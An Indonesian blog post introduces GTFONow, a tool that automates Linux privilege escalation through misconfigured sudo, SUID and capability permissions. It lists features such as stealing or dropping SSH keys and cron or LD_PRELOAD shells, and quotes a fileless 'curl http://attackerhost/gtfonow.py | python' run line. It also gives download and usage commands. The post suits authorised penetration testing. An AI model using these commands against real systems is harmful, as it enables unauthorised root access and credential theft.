Beranda / Post Exploitation / Tools

Privilege Escalation di Linux Menggunakan GTFONow

Diposting oleh Problem Child Posting Komentar

Permudah Privilege Escalation di Linux Menggunakan GTFONow. Kali ini saya akan membagikan sebuah tool yang mungkin akan berguna pada fase Post Exploitation di server Linux. Tool ini bernama GTFONow, yang bertujuan untuk memeriksa miskonfigurasi pada permission file atau binary di Linux, yang nantinya dapat dimanfaatkan untuk melakukan privilege escalation ke user root.

Fitur

Berikut fitur GTFONow yang saya kutip langsung dari GitHub mereka:
  • Automatically exploit misconfigured sudo permissions.
  • Automatically exploit misconfigured suid, sgid permissions.
  • Automatically exploit misconfigured capabilities.
  • Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
  • Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
  • Automatically convert arbitrary file write primitive into shell by writing to cron.
  • Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
  • Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python.

Penggunaan

Seperti yang sudah ditulis pada fitur, kalian tidak perlu melakukan cloning seluruh repository. Cukup unduh file python dari GTFONow saja dengan perintah:
wget https://raw.githubusercontent.com/Frissi0n/GTFONow/main/gtfonow/gtfonow.py 
python gtfonow.py --help
Output:
nino@nakano:/tmp$ python gtfonow.py --help
usage: gtfonow.py [-h] [--level {1,2}] [--risk {1,2}] [--sudo_password]
                  [--command COMMAND] [-v] [-a]

GTFONow: Automatic privilege escalation using GTFOBins

optional arguments:
  -h, --help         show this help message and exit
  --level {1,2}      Level of checks to perform. Default level 1 for a quick
                     scan.
  --risk {1,2}       Risk level of exploit to perform. Default risk level 1
                     for safe operations.
  --sudo_password    If you know the sudo password, enable sudo_password mode
                     for more privilege escalation options.
  --command COMMAND  Rather than spawn an interactive shell, issue a single
                     command. Mainly for debugging purposes only.
  -v, --verbose      Enable verbose output.
  -a, --auto         Auto exploit without prompting for user input.
Berikut contoh perintah yang bisa kita gunakan:
python gtfonow.py --level 2 --risk 2

Download

Tool open source ini dapat diunduh di GitHub melalui link berikut:
  • https://github.com/Frissi0n/GTFONow
Oke mungkin sekian sharing kali ini, semoga bermanfaat.

Posting Komentar untuk "Privilege Escalation di Linux Menggunakan GTFONow"

Posting Komentar

Silahkan tinggalkan komentar jika ada masukan, pertanyaan, kritik ataupun dukungan. Namun pastikan untuk berkomentar secara sopan.